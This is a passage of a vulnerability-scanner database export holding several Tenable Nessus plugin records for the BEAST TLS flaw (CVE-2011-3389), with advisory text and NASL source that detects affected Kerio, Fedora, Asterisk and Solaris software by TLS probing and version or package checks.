ciphers['TLS1_CK_ECDHE_RSA_WITH_AES_128_CBC_SHA'],\n ciphers['TLS1_CK_ECDHE_RSA_WITH_AES_256_CBC_SHA'],\n ciphers['TLS1_CK_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA']\n );\n}\n\n\n# Try TLS 1.0 first.\nif (!ssl3_init(port:port, version:TLS_10, cipher_list:cipher_list))\n exit(1, 'ssl3_init() failed on port ' + port + ': ' + ssl3_get_lasterror());\n\n# If that failed, try SSL 3.0.\nif (!ssl3_connect())\n{\n if (!ssl3_init(port:port, version:SSL_V3, cipher_list:cipher_list))\n exit(1, 'ssl3_init() failed on port ' + port + ': ' + ssl3_get_lasterror());\n\n if (!ssl3_connect()) exit(1, ssl3_get_lasterror());\n}\n\n# Send some data to the SSL port so that some data can be returned in\n# order to test whether empty or one-byte records are used.\n\n# Create a simple HTTP GET request.\nhttp_req = http_mk_req(port:port, host:get_host_ip(), method:'GET', item:'/', add_headers:make_array('Connection','keep-alive'));\n\nsvc = known_service(port:port);\n\n# Create a service-specific message to solicit a response in order to\n# test for an empty or one-byte record.\nif (svc == 'www') req = http_mk_buffer_from_req(req:http_req);\nelse if (svc == 'smtp') req = 'EHLO client.example.org\\r\\n';\nelse if (svc == 'ftp') req = 'HELP\\r\\n';\nelse if (svc == 'ldap') req = ldap_bind_request();\nelse if (svc == 'imap') req = 'nessus CAPABILITY\\r\\n';\n\n# The following are not tested.\nelse if (svc == 'pop3') req = 'CAPA\\r\\n';\nelse if (svc == 'nntp') req = 'CAPABILITIES\\r\\n';\nelse if (svc == 'acap') req = 'nessus NOOP\\r\\n';\nelse if (svc == 'xmpp') req = '<nessus />\\n';\nelse if (svc == 'telnet') req = mkbyte(CMD_IAC) + mkbyte(CMD_DO) + mkbyte(5); # Do Status\n\n# Unknown service, send an HTTP request.\nelse req = http_mk_buffer_from_req(req:http_req);\n\n#\n# Read at least 2 application data records\n#\n# The fix for BEAST in IBMJSSE2 is to split the application data record to\n# 1/(n-1), except the first application data record.\n# So we need the second application data record to test whether it is split.\n#\nwhile(_ssl['app_recs'] < 2)\n{\n\n # Send the request.\n if (!ssl3_write(req))\n exit(1, ssl3_get_lasterror());\n\n # Read until no more application data from remote server\n data = ssl3_read();\n\n # Check response.\n if (isnull(data)) exit(1, ssl3_get_lasterror());\n if( data == '') exit(0, 'The service listening on port ' + port + ' did not return any data.');\n\n # 0/n split-record mitigation technique (OpenSSL)\n if (_ssl['empty_rec'])\n exit(0, 'The service listening on port ' + port + ' appears to use empty SSL/TLS records.');\n\n # 1/(n-1) split-record mitigation technique (MS)\n if (_ssl['one_byte_rec'])\n exit(0, 'The service listening on port ' + port + ' appears to use one-byte SSL/TLS records.');\n\n}\n\n# The SSL 3.0/TLS 1.0 server accepts a block-based cipher suite, but\n# doesn't use any mitigation techniques, so it is likely vulnerable.\nif (report_verbosity > 0)\n security_warning(port:port, extra:'\\nNegotiated cipher suite: ' + _ssl['cipher_desc'] + '\\n');\nelse\n security_warning(port);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:18:07", "description": "According to its banner, the remote host is running a version of Kerio Connect (formerly known Kerio MailServer) prior to 8.1.0. It is, therefore, affected by an information disclosure vulnerability, known as BEAST, in the SSL 3.0 and TLS 1.0 protocols due to a flaw in the way the initialization vector (IV) is selected when operating in cipher-block chaining (CBC) modes. A man-in-the-middle attacker can exploit this to obtain plaintext HTTP header data, by using a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses the HTML5 WebSocket API, the Java URLConnection API, or the Silverlight WebClient API.\n\nTLS 1.1, TLS 1.2, and all cipher suites that do not use CBC mode are not affected.", "cvss3": {}, "published": "2014-02-07T00:00:00", "type": "nessus", "title": "Kerio Connect < 8.1.0 SSL/TLS Information Disclosure (BEAST)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:kerio:connect"], "id": "KERIO_CONNECT_810.NASL", "href": "https://www.tenable.com/plugins/nessus/72393", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(72393);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2011-3389\");\n script_bugtraq_id(49778);\n script_xref(name:\"CERT\", value:\"864643\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0547\");\n\n script_name(english:\"Kerio Connect < 8.1.0 SSL/TLS Information Disclosure (BEAST)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote mail server is affected by an information disclosure\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the remote host is running a version of Kerio\nConnect (formerly known Kerio MailServer) prior to 8.1.0. It is,\ntherefore, affected by an information disclosure vulnerability, known\nas BEAST, in the SSL 3.0 and TLS 1.0 protocols due to a flaw in the\nway the initialization vector (IV) is selected when operating in\ncipher-block chaining (CBC) modes. A man-in-the-middle attacker can\nexploit this to obtain plaintext HTTP header data, by using a\nblockwise chosen-boundary attack (BCBA) on an HTTPS session, in\nconjunction with JavaScript code that uses the HTML5 WebSocket API,\nthe Java URLConnection API, or the Silverlight WebClient API.\n\nTLS 1.1, TLS 1.2, and all cipher suites that do not use CBC mode are\nnot affected.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.kerio.com/connect/history/older\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.imperialviolet.org/2011/09/23/chromeandbeast.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/~bodo/tls-cbc.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Kerio Connect 8.1.0 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/08/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/04/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:kerio:connect\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"kerio_kms_641.nasl\", \"kerio_mailserver_admin_port.nasl\");\n script_require_keys(\"kerio/port\");\n script_require_ports(\"Services/kerio_mailserver_admin\", 25, 465, 587);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nport = get_kb_item_or_exit('kerio/port');\nver = get_kb_item_or_exit('kerio/'+port+'/version');\ndisplay_ver = get_kb_item_or_exit('kerio/'+port+'/display_version');\n\n# Versions prior to 7 are called MailServer; versions after are called Connect\nif (ver =~ '^[0-6]\\\\.') product = \"Kerio MailServer\";\nelse product = \"Kerio Connect\";\n\n# Workaround works for 8.0.1 and later\nif (ver =~ '^8\\\\.0\\\\.[12]([^0-9]|$)' && report_paranoia < 2) audit(AUDIT_LISTEN_NOT_VULN, product, port, display_ver);\n\nfixed_version = \"8.1.0\";\n\nif (ver_compare(ver:ver, fix:fixed_version, strict:FALSE) == -1)\n{\n if (report_verbosity)\n {\n report =\n '\\n Product : ' + product +\n '\\n Installed version : ' + display_ver +\n '\\n Fixed version : ' + fixed_version +\n '\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n exit(0);\n}\n\naudit(AUDIT_LISTEN_NOT_VULN, product, port, display_ver);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:24:45", "description": "The latest version of Firefox and Thunderbird have the following changes :\n\n - Added Type Inference, significantly improving JavaScript performance\n\n - Added support for querying Do Not Track status via JavaScript\n\n - Added support for font-stretch\n\n - Improved support for text-overflow\n\n - Improved standards support for HTML5, MathML, and CSS\n\n - Fixed several stability issues\n\n - Fixed several security issues\n\nUpdate nss to 3.13.1\n\nYou can find the new features and bug fixes in NSS 3.13 and 3.13.1 with these Bugzilla queries :\n\nhttps://bugzilla.mozilla.org/buglist.cgi?list_id=1496878&resolution=FI XED&classification=Components&query_format=advanced&target_milestone=3 .13&product=NSS\n\nand\n\nhttps://bugzilla.mozilla.org/buglist.cgi?list_id=1496878&resolution=FI XED&classification=Components&query_format=advanced&target_milestone=3 .13.1&product=NSS\n\nNotable changes include :\n\n1. SSL 2.0 is disabled by default.\n\n2. A defense against the SSL 3.0 and TLS 1.0 CBC chosen plaintext attack demonstrated by Rizzo and Duong (CVE-2011-3389) is enabled by default. Set the SSL_CBC_RANDOM_IV SSL option to PR_FALSE to disable it.\n\n3. SHA-224 is supported.\n\n4. Added PORT_ErrorToString and PORT_ErrorToName to return the error message and symbolic name of an NSS error code.\n\n5. Added NSS_GetVersion to return the NSS version string.\n\n6. Added experimental support of RSA-PSS to the softoken only (contributed by Hanno Bock, http://rsapss.hboeck.de/).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2011-12-23T00:00:00", "type": "nessus", "title": "Fedora 16 : firefox-9.0-3.fc16 / nss-3.13.1-9.fc16 / nss-softokn-3.13.1-14.fc16 / etc (2011-17400)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:firefox", "p-cpe:/a:fedoraproject:fedora:nss", "p-cpe:/a:fedoraproject:fedora:nss-softokn", "p-cpe:/a:fedoraproject:fedora:nss-util", "p-cpe:/a:fedoraproject:fedora:thunderbird", "p-cpe:/a:fedoraproject:fedora:thunderbird-lightning", "p-cpe:/a:fedoraproject:fedora:xulrunner", "cpe:/o:fedoraproject:fedora:16"], "id": "FEDORA_2011-17400.NASL", "href": "https://www.tenable.com/plugins/nessus/57389", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2011-17400.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57389);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_bugtraq_id(51133, 51134, 51135, 51136, 51137, 51138, 51139);\n script_xref(name:\"FEDORA\", value:\"2011-17400\");\n\n script_name(english:\"Fedora 16 : firefox-9.0-3.fc16 / nss-3.13.1-9.fc16 / nss-softokn-3.13.1-14.fc16 / etc (2011-17400)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The latest version of Firefox and Thunderbird have the following\nchanges :\n\n - Added Type Inference, significantly improving JavaScript\n performance\n\n - Added support for querying Do Not Track status via\n JavaScript\n\n - Added support for font-stretch\n\n - Improved support for text-overflow\n\n - Improved standards support for HTML5, MathML, and CSS\n\n - Fixed several stability issues\n\n - Fixed several security issues\n\nUpdate nss to 3.13.1\n\nYou can find the new features and bug fixes in NSS 3.13 and 3.13.1\nwith these Bugzilla queries :\n\nhttps://bugzilla.mozilla.org/buglist.cgi?list_id=1496878&resolution=FI\nXED&classification=Components&query_format=advanced&target_milestone=3\n.13&product=NSS\n\nand\n\nhttps://bugzilla.mozilla.org/buglist.cgi?list_id=1496878&resolution=FI\nXED&classification=Components&query_format=advanced&target_milestone=3\n.13.1&product=NSS\n\nNotable changes include :\n\n1. SSL 2.0 is disabled by default.\n\n2. A defense against the SSL 3.0 and TLS 1.0 CBC chosen plaintext\nattack demonstrated by Rizzo and Duong (CVE-2011-3389) is enabled by\ndefault. Set the SSL_CBC_RANDOM_IV SSL option to PR_FALSE to disable\nit.\n\n3. SHA-224 is supported.\n\n4. Added PORT_ErrorToString and PORT_ErrorToName to return the error\nmessage and symbolic name of an NSS error code.\n\n5. Added NSS_GetVersion to return the NSS version string.\n\n6. Added experimental support of RSA-PSS to the softoken only\n(contributed by Hanno Bock, http://rsapss.hboeck.de/).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://rsapss.hboeck.de/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://rsapss.hboeck.de/\"\n );\n # https://bugzilla.mozilla.org/buglist.cgi?list_id=1496878&resolution=FIXED&classification=Components&query_format=advanced&target_milestone=3.13&product=NSS\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c50d6ac0\"\n );\n # https://bugzilla.mozilla.org/buglist.cgi?list_id=1496878&resolution=FIXED&classification=Components&query_format=advanced&target_milestone=3.13.1&product=NSS\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?132ae2a7\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-December/071320.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1fa18268\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-December/071321.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?92f4593c\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-December/071322.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a6791be1\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-December/071323.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?05d0db8f\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-December/071324.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b974e724\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-December/071325.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?af682fa6\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-December/071326.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?01c5fc18\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:nss\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:nss-softokn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:nss-util\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:thunderbird-lightning\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:xulrunner\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:16\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/12/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/12/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^16([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 16.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC16\", reference:\"firefox-9.0-3.fc16\")) flag++;\nif (rpm_check(release:\"FC16\", reference:\"nss-3.13.1-9.fc16\")) flag++;\nif (rpm_check(release:\"FC16\", reference:\"nss-softokn-3.13.1-14.fc16\")) flag++;\nif (rpm_check(release:\"FC16\", reference:\"nss-util-3.13.1-3.fc16\")) flag++;\nif (rpm_check(release:\"FC16\", reference:\"thunderbird-9.0-4.fc16\")) flag++;\nif (rpm_check(release:\"FC16\", reference:\"thunderbird-lightning-1.1-0.1.rc1.fc16\")) flag++;\nif (rpm_check(release:\"FC16\", reference:\"xulrunner-9.0-2.fc16\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"firefox / nss / nss-softokn / nss-util / thunderbird / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:20:24", "description": "According to its SIP banner, the version of Asterisk running on the remote host is affected by the following vulnerabilities :\n\n - An information disclosure vulnerability, known as BEAST, exists in the SSL 3.0 and TLS 1.0 protocols due to a flaw in the way the initialization vector (IV) is selected when operating in cipher-block chaining (CBC) modes. A man-in-the-middle attacker can exploit this to obtain plaintext HTTP header data, by using a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses the HTML5 WebSocket API, the Java URLConnection API, or the Silverlight WebClient API. (CVE-2011-3389)\n\n - An integer overflow condition exists in sip.conf due to improper validation of user-supplied input when handling 'timert1' values. A remote attacker can exploit this to cause a denial of service.\n\n - An unspecified flaw exists due to improper handling of FAT data in UDPTL packets. A remote attacker can exploit this to cause a denial of service.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2016-02-12T00:00:00", "type": "nessus", "title": "Asterisk Multiple Vulnerabilities (AST-2016-001 - AST-2016-003) (BEAST)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:digium:asterisk"], "id": "ASTERISK_AST_2016_003.NASL", "href": "https://www.tenable.com/plugins/nessus/88715", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88715);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2011-3389\");\n script_bugtraq_id(\n 49778,\n 82651,\n 82656,\n 82670\n );\n script_xref(name:\"CERT\", value:\"864643\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0547\");\n\n script_name(english:\"Asterisk Multiple Vulnerabilities (AST-2016-001 - AST-2016-003) (BEAST)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A telephony application running on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its SIP banner, the version of Asterisk running on the\nremote host is affected by the following vulnerabilities :\n\n - An information disclosure vulnerability, known as BEAST,\n exists in the SSL 3.0 and TLS 1.0 protocols due to a\n flaw in the way the initialization vector (IV) is\n selected when operating in cipher-block chaining (CBC)\n modes. A man-in-the-middle attacker can exploit this\n to obtain plaintext HTTP header data, by using a\n blockwise chosen-boundary attack (BCBA) on an HTTPS\n session, in conjunction with JavaScript code that uses\n the HTML5 WebSocket API, the Java URLConnection API,\n or the Silverlight WebClient API. (CVE-2011-3389)\n\n - An integer overflow condition exists in sip.conf due to\n improper validation of user-supplied input when handling\n 'timert1' values. A remote attacker can exploit this to\n cause a denial of service.\n\n - An unspecified flaw exists due to improper handling of\n FAT data in UDPTL packets. A remote attacker can exploit\n this to cause a denial of service.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://downloads.asterisk.org/pub/security/AST-2016-001.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://downloads.asterisk.org/pub/security/AST-2016-002.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://downloads.asterisk.org/pub/security/AST-2016-003.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.imperialviolet.org/2011/09/23/chromeandbeast.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Asterisk version 11.21.1 / 13.7.1 / 11.6-cert12 /\n13.1-cert3. Alternatively, apply the appropriate patch referenced in\nthe vendor advisories.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2011-3389\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/08/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/12\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:digium:asterisk\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"asterisk_detection.nasl\");\n script_require_keys(\"asterisk/sip_detected\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"asterisk/sip_detected\");\n\nasterisk_kbs = get_kb_list_or_exit(\"sip/asterisk/*/version\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nis_vuln = FALSE;\nnot_vuln_installs = make_list();\nerrors = make_list();\n\nforeach kb_name (keys(asterisk_kbs))\n{\n vulnerable = 0;\n patch_only = FALSE;\n\n matches = eregmatch(pattern:\"/(udp|tcp)/([0-9]+)/version\", string:kb_name);\n if (isnull(matches))\n {\n errors = make_list(errors, \"Unexpected error parsing port number from '\"+kb_name+\"'.\");\n continue;\n }\n\n proto = matches[1];\n port = matches[2];\n version = asterisk_kbs[kb_name];\n\n if (version == 'unknown')\n {\n errors = make_list(errors, \"Unable to obtain version of install on \" + proto + \"/\" + port + \".\");\n continue;\n }\n\n banner = get_kb_item(\"sip/asterisk/\" + proto + \"/\" + port + \"/source\");\n if (!banner)\n {\n # We have version but banner is missing;\n # log error and use in version-check though.\n errors = make_list(errors, \"KB item 'sip/asterisk/\" + proto + \"/\" + port + \"/source' is missing.\");\n banner = 'unknown';\n }\n\n # Open Source 1.8.x\n # Patch does not change version.\n if (version =~ \"^1\\.8([^0-9]|$)\" && \"cert\" >!< tolower(version))\n {\n fixed = \"See vendor for patch information.\";\n patch_only = TRUE;\n }\n\n # Open Source 11.x\n if (version =~ \"^11([^0-9]|$)\" && \"cert\" >!< tolower(version))\n {\n fixed = \"11.21.1\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n # Open Source 12.x\n # Patch does not change version\n else if (version =~ \"^12([^0-9]|$)\" && \"cert\" >!< tolower(version))\n {\n fixed = \"See vendor for patch information.\";\n patch_only = TRUE;\n }\n\n # Open Source 13.x\n else if (version =~ \"^13([^0-9]|$)\" && \"cert\" >!< tolower(version))\n {\n fixed = \"13.7.1\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n # Asterisk Certified 1.8.28-certx\n # Patch does not change version.\n else if (version =~ \"^1\\.8\\.28([^0-9])\" && \"cert\" >< tolower(version))\n {\n fixed = \"See vendor for patch information.\";\n patch_only = TRUE;\n }\n\n # Asterisk Certified 11.6-certx\n else if (version =~ \"^11\\.6([^0-9])\" && \"cert\" >< tolower(version))\n {\n fixed = \"11.6-cert12\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n # Asterisk Certified 13.1-certx < 13.1-cert2\n else if (version =~ \"^13\\.1([^0-9])\" && \"cert\" >< tolower(version))\n {\n fixed = \"13.1-cert3\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n if (vulnerable < 0 || patch_only == TRUE)\n {\n is_vuln = TRUE;\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : ' + banner +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed +\n '\\n';\n security_warning(port:port, proto:proto, extra:report);\n }\n else security_warning(port:port, proto:proto);\n }\n else not_vuln_installs = make_list(not_vuln_installs, version + \" on port \" + proto + \"/\" + port);\n}\n\nif (max_index(errors))\n{\n if (max_index(errors) == 1) errmsg = errors[0];\n else errmsg = 'Errors were encountered verifying installs : \\n ' + join(errors, sep:'\\n ');\n\n exit(1, errmsg);\n}\nelse\n{\n installs = max_index(not_vuln_installs);\n if (installs == 0)\n {\n if (is_vuln) exit(0);\n else audit(AUDIT_NOT_INST, \"Asterisk\");\n }\n else audit(AUDIT_INST_VER_NOT_VULN, \"Asterisk\", not_vuln_installs);\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:19:14", "description": "NSS_NSPR_JSS 3.13.1 Solaris: NSPR 4.8.9 / NSS 3.13.1 / JSS 4.3.2 M.\nDate this patch was last updated by Sun : Feb/08/12", "cvss3": {}, "published": "2018-03-12T00:00:00", "type": "nessus", "title": "Solaris 10 (sparc) : 125358-15 (BEAST)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:oracle:solaris:10:125358", "cpe:/o:oracle:solaris:10"], "id": "SOLARIS10_125358-15.NASL", "href": "https://www.tenable.com/plugins/nessus/107424", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(107424);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2011-3389\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0547\");\n\n script_name(english:\"Solaris 10 (sparc) : 125358-15 (BEAST)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing Sun Security Patch number 125358-15\");\n script_set_attribute(attribute:\"description\", value:\n\"NSS_NSPR_JSS 3.13.1 Solaris: NSPR 4.8.9 / NSS 3.13.1 / JSS 4.3.2 M.\nDate this patch was last updated by Sun : Feb/08/12\");\n script_set_attribute(attribute:\"see_also\", value:\"https://getupdates.oracle.com/readme/125358-15\");\n script_set_attribute(attribute:\"solution\", value:\n\"Install patch 125358-15 or higher\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2011-3389\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/09/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", 